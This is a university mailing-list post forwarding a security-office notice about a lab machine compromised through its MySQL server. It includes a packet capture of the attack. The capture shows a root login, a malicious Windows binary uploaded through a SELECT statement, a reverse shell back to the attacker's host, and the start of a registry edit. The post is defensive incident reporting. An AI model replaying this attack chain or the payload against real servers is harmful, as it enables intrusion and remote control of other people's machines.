[4eyes] [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server

Thu Jan 19 17:58:48 PST 2017

No one has claimed this machine yet. Please check yours and let me know. (There are usual suspects here, but I won't name names!)

	Matthew

-----Original Message-----
From: Matthew Turk [mailto:mturk21 at gmail.com] On Behalf Of Matthew Turk
Sent: Wednesday, January 18, 2017 9:20 PM
To: ilab-users at lists.cs.ucsb.edu
Subject: FW: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server

Whose machine is 128.111.28.118? Please check - if it's yours, please let me know and see the info below.

Thanks,
	Matthew

-----Original Message-----
From: Tier II Support Issues via CoE Support [mailto:help at engineering.ucsb.edu]
Sent: Wednesday, January 18, 2017 10:41 AM
To: holl at cs.ucsb.edu; mturk at cs.ucsb.edu
Subject: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server

The following reply has been made regarding CoE Support ticket #74336:

Hi Matt and Tobias,

OIT has sent us this warning about ilab-118 machine that is compromised and needs to be looked into. Please read the information below.

On Wed Jan 18 10:24:26 2017, security at ucsb.edu wrote:
> Greetings,
>
> 128.111.28.118 has been compromised and has been blocked. The host was 
> compromised via its MySQL server.
>
> Before correcting any problems, please consider whether any sensitive 
> personal information is stored on this device. If this device contains 
> personal information and if it appears to have been compromised, 
> please contact the UCSB Chief Information Security Officer, at 
> CISO at oist.ucsb.edu or 893-5005 immediately.
>
> To view the UCSB procedures when a device storing personal information 
> has been compromised, please visit:
> http://www.ets.ucsb.edu/security/sb-1386-and-ab-1298-guideline
>
> Please investigate and advise. Here is a sample of traffic from the
> trojan:
>
> ----------sample----------
> T 2017/01/18 02:45:47.091988 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> ......
>
> T 2017/01/18 02:45:47.497391 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
> J...
> 5.5.11..+..EV``AdUY...!...............B~tMc*DXpHVW.mysql_native_password.
>
> T 2017/01/18 02:45:47.684113 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
>
V.......... at ........................root......Ndy....3......;.mysql.mysql_native_password.
>
> T 2017/01/18 02:45:47.684972 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
> ...........
>
> T 2017/01/18 02:45:47.878832 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
> .....SELECT @@max_allowed_packet;
>
> T 2017/01/18 02:45:47.899132 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
>
.....*....def....@@max_allowed_packet..?.........................1048576.........
>
> T 2017/01/18 02:45:48.088029 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
> .....SHOW VARIABLES LIKE 'VERS%';
>
> T 2017/01/18 02:45:48.287569 128.111.28.118:3306 ->
> 188.132.176.26:3549 [A]
> ......
>
> T 2017/01/18 02:45:48.331489 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
>
.....T....def.information_schema.VARIABLES.VARIABLES.Variable_name.VARIABLE_NAME... at .........M....def.information_schema.VARIABLES.VARIABLES.Value.VARIABLE_VALUE...................."......version.5.5.11-
> ....version_comment.MySQL Community Server 
> (GPL).....version_compile_machine.x86.....version_compile_os.Win64.......".
>
> T 2017/01/18 02:45:48.682703 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> ......
>
> T 2017/01/18 02:45:50.427705 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
>
> ....USE MYSQL
>
> T 2017/01/18 02:45:50.428403 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
> ...........
>
> T 2017/01/18 02:45:50.613848 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
> .....SELECT @@version_compile_os;
>
> T 2017/01/18 02:45:50.614481 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
>
.....*....def....@@version_compile_os............................Win64.........
>
> T 2017/01/18 02:45:50.800022 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
> .....SELECT @@plugin_dir;
>
> T 2017/01/18 02:45:50.800759 128.111.28.118:3306 ->
> 188.132.176.26:3549 [AP]
> ....."....def....@@plugin_dir....2..................3...2C:\Program
> Files\MySQL\MySQL Server 5.5\lib/plugin.........
>
> T 2017/01/18 02:45:50.990204 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> .l...SELECT
>
'MZ.\0.\0\0\0.\0\0\0..\0\0.\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.\0\0\0....\0...!..L.!This
> program cannot be run in DOS
>
mode.\r\r\n$\0\0\0\0\0\0\0....[...[...[...R.\".G...R.%.3...R.5.\\...[...1...R.3.P...R./.Z...R.4.Z...R.7.Z...Rich[...\0\0\0\0\0\0\0\0PE\0\0d..\0?..M\0\0\0\0\0\0\0\0.\0\"
>
...\0\0.\0\0\0V\0\0\0\0\0\0D.\0\0\0.\0\0\0\0\0..\0\0\0\0.\0\0\0.\0\0.\0.\0\0\0\0\0.\0.\0\0\0\0\0\0..\0\0.\0\0...\0.\0\0\0\0\0.\0\0\0\0\0\0.\0\0\0\0\0\0\0\0.\0\0\0\0\0\0.\0\0\0\0\0\0\0\0\0\0.\0\0\0...\0..\0\0...\0P\0\0\0\0`.\0..\0\0\0P.\0..\0\0\0\0\0\0\0\0\0\0\0p.\0..\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.text\0\0\0p.\0\0\0.\0\0\0.\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0
>
\0\0`.rdata\0\0..\0\0\0.\0\0\00\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0 at .data\0\0\0.5\0\0\0..\0\0.\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0..pdata\0\0!
>
..\0\0\0P.\0\0\n\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0 at .rsrc\0\0\0..\0\0\0`.\0\0.\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0 at .reloc\0\0..\0\0\0p.\0\0.\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0B\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
>
> T 2017/01/18 02:45:50.990462 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
>
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.:\0tPH..D.\0\0I.\0H..B.\0\0I. at .H..?.\0\0I. at .H..<.\0\0I. at .H..9.\0\0I.@
>
H..6.\0\0I.@(...3.\0\0fA. at 0...2..........H..!.\0\0I.\0H....\0\0I. at .H....\0\0I. at ...\Z.\0\0A. at ......\0\0fA. at ......\0\0A. at .A...\0\0\0I........:.u.H.B..8\0u....2..H....\0\0I.\0H....\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
> .....\0\0fA.@(.....\0\0A.@*................\0\0............. at SH..
> H.J.I..H.....\0\0L..H..u.H.L$P...H..
> [.H.|$03.H...I....H.|$0I..H..H....H.. [................H.\\$.WH..
>
.:.I..H..tUH.\rT...H....\0\0I.\0H....\0\0I. at .H....\0\0I. at .....\0\0A. at ......\0\0fA. at ......\0\0A. at ...H.\\$0H..
>
_.H.B..8\0tJH.\r....H....\0\0I.\0H..\0.\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
> ..H.\\$0H.. _.. at .\0\0\!
> 0\0H.B..H..\0.L.....\0\0H.G.H..u?H.\r....H..
> .\0\0H..H..(.\0\0H.C.H..0.\0\0H.C....8.\0\0f.C...H.\\$0H..
> _.2.H.\\$0H..
> _......H..(H.I.H..t..^.\0\0H..(..........H.\\$.H.t$.WH..
>
H.B.H.q.H..H.R.D.\0H..H..I.\\0....\0\0L._.H..A....0\0H.G.H.W.D. at .H.R..\\.\0\0L._.H..A.C.H.....\0....\0\0H.\\$0H.t$8H.H..
>
_...H..(H.J.H.....\0\0H.H..(...........:.u.H.B..8\0u.2..H....\0\0I.\0H....\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
> .....\0\0fA.@(.....\0\0A.@*..................H.t$ WATA
>
> T 2017/01/18 02:45:50.990557 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> VH.. .\0.\0\0H.l$HM..L.l$PH...`.\0\0..\0\0\0L...S.\0\0E3.H..\r.\0\0D.
>
H.O.H..H.....\0\0A.T$.I..L..H...p.\0\0H..tYH.\\$@f.H...3.I....H..B.\\!.H.y.H.....#.\0\0A..D..H..I..H.....\0\0L....\0\0\0I..D.....\0\0H..u.H.\\$@H....\r\0\0.>\0L.l$PH.l$Ht/H...A.D$.H....0\03...H..H..H..A..H.t$XH..
> A^A\\_.H.D$`.\0.H..H.t$XH..
>
A^A\\_...............H.\\$.H.t$.WH..0H.z.H...3.H.?H..D.H at ..A.\0.\0\0H..H..H.y.3.....\0\0H.V.L..H..H..H.....\0\0H.T$HL..B\0\0\0H.T$(L..3.3..D$
>
\0\0\0\0....\0\0...H......\0\0H.\\$@H.t$P3.H..0_...........H..(.\'.\0\0.\03.H..(............... at UVATH....\0\0H..\r.\0\0H3.H..$..\0\0H.....H.L$xD.EaE3.3.D.d$p.d(\0\03.H.D$XH.D$`L.d$PH......\0\0H..$..\0\0H..$..\0\0L..$..\0\0A..\0\0\0H..$.\0\0\0A....k.\0\0.^...>H.....\0\0.U.D.E.E3.A..D.d$(D.d$
>
..h.\0\0...H..3.H..$.\0\0\0fD..$.\0\0\0..$.\0\0\0H..$.\0\0\0..\".\0\0D.E.H..$.\0\0\0H..f..$.\0\0\0....\0\0H..$..\0\0H..$..\0\0.....\0\0\0H.L$p..:.\0\0H..$..\0\0H.\r3.\0\0A...\0\0.D$ph\0\0\0..$.\0\0\0..\0\0fD..$.\0\0\0H..$.\0\0\0H..$.\0\0\0H..$.!
>
\0\0\0....\0\0....x\0\0\0H.D$PH..$..\0\0E3.H.D$HH.D$pE3.H.D$@L.d$8L.d$03..D$(.\0\0\0.D$
>
.\0\0\0....\0\0..t0A..H.L$P...\0\0....\0\0=..\0\0t.H.L$P..~.\0\0H.L$X..s.\0\0A..H......\0\0H......\0\0L..$..\0\0..H..$..\0\0H3....\0\0H....\0\0A\\^]..........:.u.H.B..8\0u..x.\0u.2..H..\Z.\0\0I.\0H....\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
>
.....\0\0fA.@(.......H.\\$.WH..0..\0\0\0H....\n\0\0H..H..tUH.O.H....<.\0\0.C.H.O.H.I....\0\0L..-
> ...L..f..3.3.H.D$(3..D$ ..z.\0\0H....i.
>
> T 2017/01/18 02:45:50.990690 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
>
\0\03.H.\\$@H..0_.H..\0\0\0\0\0\0\0H.\\$@H..0_........2...............H.\\$.WH..PH.D$0....3..D$8.\0\0\0.D$D.\0\0\0..5.\0\0L.D$0.W(H......\0\0.....\0\0\0L.D$<H....\0\03.....\0\0....tHH.L$0L.D$8E3.3.H.|$(H.|$
> ....\0\0....t#D.O.E3.3.3..D$
>
.\0\0\0..d.\0\0....t.\0\0..H.L$0....\0\0..[.\0\0t...t\r3.H.\\$`H..P_.H..\0\0\0\0\0\0\0H.\\$`H..P_..UH..H.E...............ff...\0\0\0\0\0H;\r..\0\0u.H...f....u...H....U.\0\0.H..t7SH..
> L..H.\r...\03...L.\0\0..u....\0\0H......\0\0...k.\0\0..H..
>
[....H..(L...\n.\0D...\n.\0M..I..I...M..M;.s.H9\nt.H...I;.r.I;.s.H...VH..uOA. at .A;.rF..H.........H;.s5D.A.I...e.\0\0L..H..t!.\r[\n.\0H..\\\n.\0H..H...I.....\rB\n.\0..3.H..(..H..H.X.H.H.VWATAUAVH..0.\0\0L..3.L..H.\\$h.X..X..X\Z.\\$`..H;....;.u&...\0\0.\0.\0\0\0H.\\$
> E3.E3.3.3....\0\03....\0\0..H;....;.u&...\0\0.\0.\0\0\0H.\\$
> E3.E3.3.3....\0\03....\0\0.
> 8\nu...\0\0\0H..8\nt.....\0\0\0..<wt*<rt&.P.\0\0.\0.\0\0\0H.\\$
>
E3.E3.3.3..Z.\0\03....\0\0..$p.\0\0H..8\nu.H..8\nt...:.t.<tt*<bt&...\0\0.\0.\0\0\0H.\\$
> E3.E3!
>
.3.3....\0\03..:.\0\0..$q.\0\0<tu.A.\0@\0\0..D...\0.\0\0<bD.D.A.....\0.\0\0H.L$X..*\0\0.......\0\0..$p.\0\0wu...D....$x.\0\0.t$P....D....$x.\0\0.\\$P..\0\0\0..\Z\0\0;.u..L$X.Y)\0\0.L$\\.P)\0\03....\0\0..\0\0\0...\0\0..t$t.t$p....\0\0Ic.HcL.XH..H...L...&.\0...Hk.XI....D$0.\0\0\0.t$(.d$
>
\0L..$.\0\0\0L..H..\nH....z.\0\0......\0\0.L.X..(\0\0.d.p\0HcD$PH..$p.\0\0.L.X.\Z\"\0\0L..H..$.\0\0\0H......\0\03......H..$.\0\0\0H......\0\0L....\0\03.H.L$h.+\r\0\0....t\Z...u.H.d$
> \0E
>
> T 2017/01/18 02:45:50.990877 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> 3.E3.3.3..c.\0\0..u\nL.l$hM..u.L.-..\0\0.h\0\0\0L..3.H..$.\0\0\0..
>
\0\0..$.\0\0\0..$.\0\0\0\0.\0\0..u.H..$.\0\0\0H..H.\r.%.\0..H.\r.%.\0H..H..$.\0\0\0H..$..\0\0;.t.H.AXH..$..\0\0H...\0\0\0H..$
>
.\0\0I...x.\0\0H..I...m.\0\0H..H.\r..\0\0.^.\0\0H.\\..H..H.....\0\0L..3.H;.....\0\0M..H..H.....\0\0;.t.H.|$
> E3.E3.3.3..n.\0\0L....\0\0H..I.....\0\0;.t.H.|$
> E3.E3.3.3..D.\0\0L..$`.\0\0H..I.....\0\0;.t.H.|$
>
E3.E3.3.3....\0\0...\0\0....$`.\0\03.I...\r.\0\0;.uEH..$.\0\0\0H.D$HH..$.\0\0\0H.D$@H.|$8H.|$0.|$(.t$
> E3.E3.I..I......\0\0...D.\0\0H.|$xH.....\0\0...\0\0H..H..u-
>
3......I.......H.L$h........\0\0..D..$x.\0\0.l.\0\0L....\0\03.H.L$x...\0\0....t\Z...u.H.d$
>
\0E3.E3.3.3..>.\0\0..t?H.L$x.L...H...D...I...<...H.L$h.2......\0\0..$`.\0\0..D..$x.\0\0...\0\0H.L$x3.A...\0\0H...6.\0\0H..$.\0\0\0H;...<.\0\08.....\0\0H...q.\0\0H.\\8..;\\uA.\\\0\0\0H....\Z\0\0H;.taL....\0\0...\0\0H...1.\0\0..tIH.d$
> \0E3.E3.3.3..|.\0\0.2.;/t-L....\0\0...\0\0H.....\0\0..t.H.d$
> \0E3.E3.3.3..H.\0\0I.....\0\0H..H.....\0\0H..!
> ...\0\0H;....\0\0\0M..H..H.....\0\03.;.t.H.\\$
>
E3.E3.3.3....\0\03.H....\Z\0\0;.uBH..$.\0\0\0H.D$HH..$.\0\0\0H.D$@H.\\$8H.\\$0.\\$(.t$
>
E3.E3.I..H......\0\0....H..$.\0\0\0......t$`.\n.t$`...t$`H.L$x.....H.........$`.\0\03.I.......H.L$h.~...H..$.\0\0\0....\0\0H..$.\0\0\0..r.\0\0.E.\0\0..;.t.H..$.\0\0\0H..$.\0\0\0H.A.L.1.mH..$.\0\0\0H.9D..$x.\0\0..D..$x.\0\0I...1.\0\0Hc|$P.d.p\0E3.L..$.\0\0\0.\n.|$P...|$PIc..|.p\0t..L.X..#\0\0Hc..|.p\0t\n.L.X..#\0\0...\0\0\0...\0\0I..H..
>
> T 2017/01/18 02:45:50.990879 188.132.176.26:3549 ->
> 128.111.28.118:3306 [AP]
>
$h.\0\0H..0.\0\0A^A]A\\_^.H.t$.H.|$.ATH..0L..H...3.H.......u\'.l\r\0\0.\0.\0\0\0H.d$
>
\0E3.E3.3.3..u.\0\0....\0\0\0..\0\0\0...\0\0..u.....\0\0\0..\0\0\0...\0\0.I...z...H..H..u\r..\r\0\0.\0.\0\0\0.PI...5.\0\0.\0\r\0\0D.
> ...\0\0.
> \0A..\0\0\0H.V.H.L$@.9\'\0\0H;.u\n...\0\0.8.u..|$@...\0\0D.
> H.&\0H.f.\0..\0\0\0...\0\0..H.t$HH.|$PH..0A\\.H.\\$.H.t$.WH..
> H..H...w|..\0\0\0H..H.E.H.\r=..\0H..u .k-
>
\0\0..\0\0\0.9+\0\0..\0\0\0..\'\0\0H.\r...\0L..3.....\0\0H..H..u,9....\0t.H...y-
> \0\0..t\r...\".\0\0.\0.\0\0\0...\0\0.\0.\0\0\0H.....S-
> \0\0...\0\0.\0.\0\0\03.H.\\$0H.t$8H..
>
_...3.D.B\n../\0\0.H.\\$.WH..PH..L....\0\0H.L$`3.3.H.\\$`.Y.\0\0;.t....u.E3.E3.3.3.H.\\$
>
...\0\0H.L$`H.L$0H;.u\ZH;....\0\0\03....\0\0;......\0\0\0H....\0\0H.|$@H.\\$HH.D$8H;.tM.O.\0\0.8.H.\0\0L.D$0..H.T$0E3.3...3\0\0.....t..&.\0\0.8.8...\0\0.8.t\n...\0\0.8\ru$...\0\0.8H..p.\0\0L.D$0E3.3.H.T$0.
> /\0\0..H.L$`.......H.\\$hH..P_.....
>
> T 2017/01/18 02:45:50.991064 128.111.28.118:3306 ->
> 188.132.176.26:3549 [A]
> ......
>
> T 2017/01/18 02:45:50.991120 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
>
.............ff...\0\0\0\0\0L..M..t$H+....t(..........\0\0\0H..I..t....u...I...H...H...H..I...r&I........~L..L..I...M3.I.\0.......M..t.I......\0\0\0........\0\0\0H..I..tx...$.tuH..I..tiH........tbH..I..tV...$.tSH..I..tGH........t at H..I..t4...$.t1H..I..t%........t.H..I..t....$.t.H..I....<...I...H..H3.I...rE...t\nH....I....I..
> r.H..H.Q.H.Q.H.Q.H.. I.. s.I..
>
I...r.H..H.....I...I...r...H....I..... at SVWATAUH..@I....L..L..H..H..u*..t&.,.\0\0.\0.\0\0\0H!t$
> E3.E3.3.3..6.\0\03....\0\03........u\'...\0\0.\0.\0\0\0H.d$
> \0E3.E3.3.3....\0\03..Y.\0\03.H.......u\'...\0\0.\0.\0\0\0H.d$
>
\0E3.E3.3.3...\n\0\03..&.\0\0..u.3....\0\0H..$.\0\0\0H....3\0\0..C. at ...\0\0\0H...P6\0\0...t*...t%Hc.H..H...L.....\0...Hk.XI...H.\r..\0\0..H.\r..\0\0H..L.....\0.B8.u%...t\Z...t.Hc.H..H......Hk.XI....A8.t\'...\0\0.\0.\0\0\0H.d$
>
\0E3.E3.3.3...\n\0\03.H.t$0H..tV....|$xtH.C..x.H.....H..H...\nH...84\0\0...L$p...u.M;.u.3.H.t$0..A..$I..L.d$8..\nt...A..$\0H....3\0\0H..H.. at A]A\\_^[.H.\\$.H.t$.WH..
> H..H..H..u\nH........jH!
>
..u..^....\\H...wCH.\r...\0..\0\0\0H..H.D.L..3.L......\0\0H..H..uo9....\0tPH...Q(\0\0..t+H...v.H...?(\0\0...\0\0.\0.\0\0\03.H.\\$0H.t$8H..
>
_....\0\0H......\0\0...y.\0\0.......\0\0H......\0\0...`.\0\0..H.....H.\\$.H.t$.WH..
>
.=...\0\0H.....\0H..tmH..u.H9....\0t_..5\0\0..uVH.....\0H..tJH..tEH.....\0\0H..H..H..t2...\0\0H;.v.H...<9=u.L..H...E5\0\0..t.H.....H..H.D8...3.H.\\$0H.t$8H..
> _.... at SH..0H..3.H.......u$...\0\0.\0.\0\0\0H.d$
> \0E3.E3.3.3....\0\03..`...\0\0..6\0\03.H=.
>
> T 2017/01/18 02:45:50.991124 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
> .\0\0.....u$...\0\0.\0.\0\0\0H.d$
>
\0E3.E3.3.3....\0\03..#..\0\0\0..\r\0\0.H.......H....\0\0\0...\0\0H..H..0[..H.\\$.H.t$.H.|$.ATH..0I..H..H....\0\0\0..\r\0\0.3.H.......u&.\".\0\0..\0\0\0..H.d$
> \0E3.E3.3.3..*.\0\0..\0\0\0H.\'\0H..t.H.#\03.H.......u#...\0\0..\0\0\0
> ..H.d$
>
\0E3.E3.3.3....\0\0.zH.......H..H..u.3..fH...Q.\0\0..\0\0\0L.$.I....4\0\0H..H..u....\0\0.\0.\0\0\0...\0\0...1L..I..H.....\0\0..t.H.d$
> \0E3.E3.3.3..Q.\0\0H..t.L.#3...\0\0\0...\0\0..H.\\$@H.t$HH.|$PH..0A\\.. at SH..
>
I.....u......\0\0..u.3....\0\0..7\0\0..u....\0\0....=\0\0....\0\0H.....\0..;\0\0H..\Z.\0\0...\0\0..y..h4\0\0....:\0\0..x...7\0\0..x.3....\0\0..u.....\0\0..\0\0\0.i.\0\0....u9....\0\0....z.........\0\09..\0.\0u...!\0\0H..ux.6.\0\0..4\0\0.4.\0\0.g...uV..3\0\0...\0\0..\0\0\0.].\0\0H..H....*....\r..\0\0H......\0\0H....t.3...3\0\0....\0\0H.K.......
> ...........u.3..O6\0\0..\0\0\0H..
>
[.H.\\$.H.t$.H.|$.ATH..0I....L....\0\0\0..u.9...\0\0u.3...\0\0\0...t....u0L.\r&.\0\0M..t.A...D$
> ..t.L....I...a....D$ .....\0\0\0!
> L....I....>\0\0...D$
>
...u5..u1L..3.I....>\0\0L..3.I.......L....\0\0M..t.L..3.I..A....t....u7L....I...........#....L$
> t.H....\0\0H..t.L....I.......D$
> ....3.H.\\$@H.t$HH.|$PH..0A\\.H.\\$.H.t$.WH..
> I....H.....u...=\0\0L....H..H.\\$0H.t$8H..
>
_........H.L$.H...\0\0\0H.\ry.\0\0..c.\0\0L..d.\0\0L.\\$XE3.H.T$`H.L$X.K.\0\0H.D$PH.|$P\0tAH.D$8\0\0\0\0H.D$HH.D$0H.D$@H.D$(H..$.\0\0H.D$
>
L.L$PL.D$XH.T$`3....\0\0.\"H..$.\0\0\0H....\0\0H..$.\0\0\0H...H..}.\0\0H....\0\0H..G.\0\0H..$.\
>
> T 2017/01/18 02:45:50.991425 128.111.28.118:3306 ->
> 188.132.176.26:3549 [A]
> ......
>
> T 2017/01/18 02:45:50.991744 128.111.28.118:3306 ->
> 188.132.176.26:3549 [A]
> ......
>
> T 2017/01/18 02:45:51.015642 128.111.28.118:3306 ->
> 188.132.176.26:3549 [A]
> ......
>
> T 2017/01/18 02:45:51.176555 188.132.176.26:3549 ->
> 128.111.28.118:3306 [A]
>
0\0\0H..H.\0\0....\0\0..\0.....\0\0.\0\0\0H....\0\0H.D$hH....\0\0H.D$p..n.\0\0....\0\0..\0\0\0.v=\0\03...N.\0\0H.\r..\0\0..9.\0\0.=b.\0\0\0u\n..\0\0\0.N=\0\0....\0\0...\0.H....\n.\0\0H...\0\0\0...L.\r9.\0\03.I..D. at .;\nt+..I....-
>
r..A....w..\r\0\0\0...D.....\0\0\0...A.F..H.A.D....H..(.o1\0\0H..u.H..K.\0\0..H...H..(.H..(.O1\0\0H..u.H../.\0\0..H...H..(. at SH..
> ...+1\0\0H..u.H....\0\0..H.......1\0\0L....\0\0H..t.L.P....;...A..H..
>
[....L$.H..(E3..\0.\0\03...X.\0\0H..!.\0\0H..t#L.D$0A..\0\0\03.H...D$0.\0\0\0..&.\0\0..\0\0\0H..(.H..(H.\r..\0\0....\0\0H.%..\0\0\0H..(...H.\r..\0\0. at SH....\0\0.d$p\0H.L$t3.A..\0\0\0.L\r\0\0L.\\$pH..$..\0\0H..$..\0\0L.\\$HH.D$P....\0\0H..$..\0\0H.T$@H..E3....\0\0H..t;H.d$8\0H.T$@H.L$`H.L$0H.L$XL..H.L$(H..$..\0\0L..H.L$
> 3..Q.\0\0.
>
H..$..\0\0H..$..\0\0H..$..\0\0H..$..\0\0H..$..\0\0.D$p..\0..D$t.\0\0\0H..$.\0\0\0....\0\03.......\0\0H.L$H....\0\0..u...u..H...:\0\0..N.\0\0...\0.H......\0\0H....\0\0[....H.\\$.H.l$.H.t$.WH..0H..H.\r..\0\0A..I..H... at .\0\0H..t\ZL.T!
> $`D..L..H..H..L.T$ ...%..\0\0\0.o:\0\0L.\\$`D..L..H..H..L.\\$
> .h...H.\\$@H.l$HH.t$PH..0_....H.\\$.H.l$.H.t$.WH..
> 3.H.....H.......H..H..u(9...\0\0v ....
> .\0\0D....\0\0D;...\0\0A...G.;.u.H.l$8H.t$@H..H.\\$0H..
> _.H..H.X.H.h.H.p.H.x ATH..
>
3.H..H..A...E3.H..H....9\0\0H..H..u*9...\0\0v\"......\0\0D....\0\0D;.g.\0\0A..A.G.A;.u.H.l$8H.t$@H.|$HH..H.\\$0H..
> A\\..H..H.X.H.h.H.p.H.x ATH..
>
3.H..H..A...H..H.......H..H..u/H..t*9...\0\0v\"......\0\0D....\0\0D;...\0\0A..A.G.A;.u.H.l$
>
> T 2017/01/18 02:45:54.767136 128.111.28.118:20138 ->
> 188.132.176.26:4000 [A]
> ......
>
> T 2017/01/18 02:45:55.049876 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> Microsoft Windows [Version 6.1.7601]
>
> T 2017/01/18 02:45:55.448211 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:45:55.448772 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> .
> Copyright (c) 2009 Microsoft Corporation. All rights reserved..
> .
> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>
> T 2017/01/18 02:45:55.776319 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:19.130812 188.132.176.26:4000 ->
> 128.111.28.118:20138 [AP]
> ipconfig
>
>
> T 2017/01/18 02:46:19.131472 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> ipconfig
>
>
> T 2017/01/18 02:46:19.304083 128.111.28.118:20138 ->
> 188.132.176.26:4000 [A]
> .
> Windows IP Configuration.
> .
> .
> Ethernet adapter Local Area Connection:.
> .
> Connection-specific DNS Suffix . : cs.ucsb.edu.
> IPv4 Address. . . . . . . . . . . : 128.111.28.118.
> Subnet Mask . . . . . . . . . . . : 255.255.255.192.
> Default Gateway . . . . . . . . . : 128.111.28.65.
> .
> Ethernet adapter Local Area Connection 2:.
> .
> Connection-specific DNS Suffix . : .
> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4::1.
> Link-local IPv6 Address . . . . . : fe80::b57a:afce:a5c3:9380%15.
> IPv4 Address. . . . . . . . . . . : 10.37.130.2.
> Subnet Mask . . . . . . . . . . . : 255.255.255.0.
> Default Gateway . . . . . . . . . : .
> .
> Ethernet adapter Local Area Connection 2:.
> .
> Connection-specific DNS Suffix . : .
> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:1::1.
> Link-local IPv6 Address . . . . . : fe80::c9a9:464b:1f35:e7b3%17.
> IPv4 Address. . . . . . . . . . . : 10.37.131.2.
> Subnet Mask . . . . . . . . . . . : 255.255.255.0.
> Default Gateway . . . . . . . . . : .
> .
> Tunnel adapter isatap.cs.ucsb.edu:.
> .
> Media State . . . . . . . . . . . : Media disconnected.
> Connection-specific DNS Suffix . : cs.ucsb.edu.
> .
> Tunnel adapter isatap.{49BB9C41-C060-433B-BF91-9F104E841F11}:.
> .
> Media State . . . . . . . . . . . : Media disconnected.
> Connection-specific DNS Suffix . : .
> .
> Tunnel adapter Local Area Connection* 11:.
> .
> Media State . . . . . . . . . . . : Media disconnected.
> Connection-spec
>
> T 2017/01/18 02:46:19.304089 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> ific DNS Suffix . : .
>
>
> T 2017/01/18 02:46:19.500202 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:19.500764 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> .
> Tunnel adapter isatap.{EB59D303-0C84-4EF4-842B-01A57D775715}:.
> .
> Media State . . . . . . . . . . . : Media disconnected.
> Connection-specific DNS Suffix . : .
> .
> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>
> T 2017/01/18 02:46:19.696722 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:44.733187 188.132.176.26:4000 ->
> 128.111.28.118:20138 [AP]
> reg.exe ADD
> "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
